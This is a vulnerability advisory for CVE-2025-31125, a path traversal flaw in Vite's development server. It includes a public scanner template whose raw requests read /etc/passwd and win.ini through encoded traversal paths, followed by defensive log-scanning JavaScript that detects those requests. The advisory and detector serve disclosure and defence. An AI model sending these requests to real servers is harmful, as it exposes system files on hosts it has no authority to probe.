CVE-2025-31125: Vite Development Server - Path Traversal

Date: 2025-08-01 | Affected software: Vite Development Server | PoC: public

Vulnerability description

Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files.

PoC code [public]

id: CVE-2025-31125

info:
  name: Vite Development Server - Path Traversal
  author: martian,ritikchaddha,v2htw
  severity: medium
  description: |
    Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files.
  remediation: |
    Upgrade to the patched version or avoid exposing the Vite development server to the network (do not use --host flag or configure server.host); if upgrading is not immediately possible, implement access restrictions to the Vite development server
  reference:
    - https://github.com/vitejs/vite/issues/8498
    - https://github.com/vitejs/vite/pull/8804
    - https://github.com/vitejs/vite/pull/8979
    - https://nvd.nist.gov/vuln/detail/CVE-2025-31125
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-31125
    epss-score: 0.04103
    epss-percentile: 0.88096
    cwe-id: CWE-200
  metadata:
    verified: true
    max-requests: 4
    shodan-query: title:"Vite App"
    fofa-query: title="Vite App"
  tags: cve,cve2025,vite,lfi,vkev,vuln

http:
  - raw:
      - |
        GET /@fs/C:/windows/win.ini?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/../../../../../../../etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/%252e%252e/%252e%252e/%252e%252e/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "data:application/octet-stream"
          - "base64"
          - "import init"
        condition: and

      - type: word
        part: header
        words:
          - "text/javascript"
# digest: 490a0046304402205fad2c2264aa197c2333d2abf6e23d26c6acbc9a68dc27c16045a1108ca1c9ca022061dfadd3a85e41270e48655800b6ae134afc114f8bb67d6a6ad86dd6791b150a:922c64590222798bb761d5b6d8e72950
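
For detection, the following added example (not part of the original template or of the Vite project) flags access-log lines whose request target has the shape the template sends: an `/@fs/` path carrying the `?import` and `.wasm?init` query markers, or dot-dot segments that only appear after repeated percent-decoding. The log format, function names and sample lines are assumptions constructed for illustration.

```javascript
// Added example: flags request lines that match the URL shape used by the
// template above. Log format and sample lines are constructed assumptions.

// Decode repeatedly so double-encoded segments (%252e -> %2e -> .) are seen.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Returns a list of reasons; an empty list means the target looks benign.
function classifyTarget(target) {
  const q = target.indexOf('?');
  const path = fullyDecode(q === -1 ? target : target.slice(0, q));
  const query = fullyDecode(q === -1 ? '' : target.slice(q + 1));
  if (!path.startsWith('/@fs/')) return [];
  const reasons = [];
  if (/(^|[&?])import\b/.test(query) && /\.wasm\?init\b/.test(query)) {
    reasons.push('import+wasm-init query on @fs');
  }
  if (path.split('/').includes('..')) reasons.push('dot-dot segment');
  return reasons;
}

// Scan access-log lines (common/combined log format assumed).
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const m = /"(?:GET|HEAD|POST) (\S+) HTTP\/[\d.]+"/.exec(line);
    if (!m) continue;
    const reasons = classifyTarget(m[1]);
    if (reasons.length) findings.push({ target: m[1], reasons });
  }
  return findings;
}

// Constructed sample lines (not real traffic).
const sampleLog = [
  '10.0.0.5 - - [01/Aug/2025:10:00:00 +0000] "GET /src/main.ts HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Aug/2025:10:00:02 +0000] "GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1" 200 2048',
  '10.0.0.9 - - [01/Aug/2025:10:00:03 +0000] "GET /@fs/%252e%252e/%252e%252e/etc/passwd?import&?inline=1.wasm?init HTTP/1.1" 200 2048',
  '10.0.0.5 - - [01/Aug/2025:10:00:04 +0000] "GET /@fs/home/dev/app/node_modules/vue/dist/vue.js HTTP/1.1" 200 9000',
];
console.log(scanLog(sampleLog));
```

Ordinary `/@fs/` module requests without the query markers are not flagged, so the check can run over reverse-proxy logs in front of a development server without alerting on normal Vite traffic.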